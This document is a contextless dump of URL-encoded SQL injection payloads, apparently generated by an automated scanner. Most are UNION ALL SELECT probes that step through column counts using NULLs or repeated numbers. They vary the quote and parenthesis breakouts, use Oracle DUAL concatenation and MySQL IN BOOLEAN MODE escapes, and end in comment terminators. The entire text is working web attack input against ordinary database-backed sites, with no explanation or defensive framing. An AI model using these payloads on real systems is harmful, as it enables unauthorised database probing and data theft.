1%27%29%20WHERE%205896%3D5896%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%205439%3D5439%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208654%3D8654%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%206476%3D6476%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204202%3D4202%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202786%3D2786%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208448%3D8448%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202378%3D2378%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%209016%3D9016%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%206256%3D6256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202922%3D2922%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207948%3D7948%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%203941%3D3941%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%202832%3D2832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%207650%3D7650%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%201928%3D1928%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20WHERE%208652%3D8652%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%203177%3D3177%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204659%3D4659%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204846%3D4846%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209052%3D9052%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%203189%3D3189%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205978%3D5978%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%204205%3D4205%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%203405%3D3405%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%209088%3D9088%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20WHERE%205921%3D5921%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%202993%3D2993%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%202682%3D2682%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201096%3D1096%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%208987%3D8987%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201401%3D1401%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%206919%3D6919%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%203790%3D3790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%208791%3D8791%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201524%3D1524%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%201950%3D1950%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27NJnG%27%20FROM%20DUAL%20WHERE%201330%3D1330%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27zozA%27%20FROM%20DUAL%20WHERE%208345%3D8345%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27DbmV%27%20FROM%20DUAL%20WHERE%207354%3D7354%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27kYwo%27%20FROM%20DUAL%20WHERE%208884%3D8884%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27AaFq%27%20FROM%20DUAL%20WHERE%205487%3D5487%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27eZjx%27%20FROM%20DUAL%20WHERE%203642%3D3642%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27pHUv%27%20FROM%20DUAL%20WHERE%206499%3D6499%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Awht%27%20FROM%20DUAL%20WHERE%201481%3D1481%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Myfw%27%20FROM%20DUAL%20WHERE%203334%3D3334%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27fFYj%27%20FROM%20DUAL%20WHERE%202916%3D2916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27FJPn%27%20WHERE%202964%3D2964%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27qHYg%27%20WHERE%202833%3D2833%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27qWjV%27%20WHERE%209447%3D9447%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27wuVz%27%20WHERE%203034%3D3034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27jCSQ%27%20WHERE%208935%3D8935%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27phOZ%27%20WHERE%203149%3D3149%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27BReS%27%20WHERE%204615%3D4615%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27fjBu%27%20WHERE%201969%3D1969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27DEzQ%27%20WHERE%204856%3D4856%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ALuQ%27%20WHERE%201033%3D1033%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20VkHp%20WHERE%205576%3D5576%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20MXzQ%20WHERE%209707%3D9707%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20zlFj%20WHERE%207683%3D7683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20GjAo%20WHERE%202661%3D2661%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20uXgE%20WHERE%206323%3D6323%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20eBCP%20WHERE%208527%3D8527%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20cikr%20WHERE%202945%3D2945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20TJDL%20WHERE%207188%3D7188%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20CYwJ%20WHERE%204349%3D4349%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20QeHh%20WHERE%207309%3D7309%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27WfaI%27%20WHERE%202831%3D2831%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27APmv%27%20WHERE%203753%3D3753%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27EYcb%27%20WHERE%202022%3D2022%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27tcrX%27%20WHERE%206223%3D6223%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27XFyW%27%20WHERE%208007%3D8007%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27jxhU%27%20WHERE%209506%3D9506%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27vUlV%27%20WHERE%208712%3D8712%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27mMFe%27%20WHERE%205889%3D5889%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27XJWt%27%20WHERE%204698%3D4698%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27qcmO%27%20WHERE%205386%3D5386%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -5741%29%20UNION%20ALL%20SELECT%208225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%23 -8967%29%20UNION%20ALL%20SELECT%208738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%23 -3973%29%20UNION%20ALL%20SELECT%202241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%2C2241%23 -5695%29%20UNION%20ALL%20SELECT%203001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%2C3001%23 -7051%29%20UNION%20ALL%20SELECT%208757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%2C8757%23 -4924%29%20UNION%20ALL%20SELECT%201391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%2C1391%23 -6691%29%20UNION%20ALL%20SELECT%207282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%2C7282%23 -4414%29%20UNION%20ALL%20SELECT%203843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%2C3843%23 -3930%29%20UNION%20ALL%20SELECT%207316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%2C7316%23 -9759%29%20UNION%20ALL%20SELECT%206157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%23 -4720%29%20UNION%20ALL%20SELECT%209305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%2C9305%23 -3515%29%20UNION%20ALL%20SELECT%205656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%2C5656%23 -1074%29%20UNION%20ALL%20SELECT%209579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%23 -5561%29%20UNION%20ALL%20SELECT%208541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%2C8541%23 -9554%29%20UNION%20ALL%20SELECT%204351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%2C4351%23 -2950%29%20UNION%20ALL%20SELECT%204334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%23 -2739%29%20UNION%20ALL%20SELECT%201847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%2C1847%23 -2050%29%20UNION%20ALL%20SELECT%205490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%2C5490%23 -1489%29%20UNION%20ALL%20SELECT%202141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%23 -3586%29%20UNION%20ALL%20SELECT%203471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%2C3471%23 -4245%29%29%20UNION%20ALL%20SELECT%206421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%2C6421%23 -6822%29%29%20UNION%20ALL%20SELECT%206889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%2C6889%23 -3049%29%29%20UNION%20ALL%20SELECT%208530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%2C8530%23 -4095%29%29%20UNION%20ALL%20SELECT%203882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%23 -9417%29%29%20UNION%20ALL%20SELECT%202044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%2C2044%23 -8512%29%29%20UNION%20ALL%20SELECT%208391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%2C8391%23 -4035%29%29%20UNION%20ALL%20SELECT%209505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%2C9505%23 -9910%29%29%20UNION%20ALL%20SELECT%202161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%2C2161%23 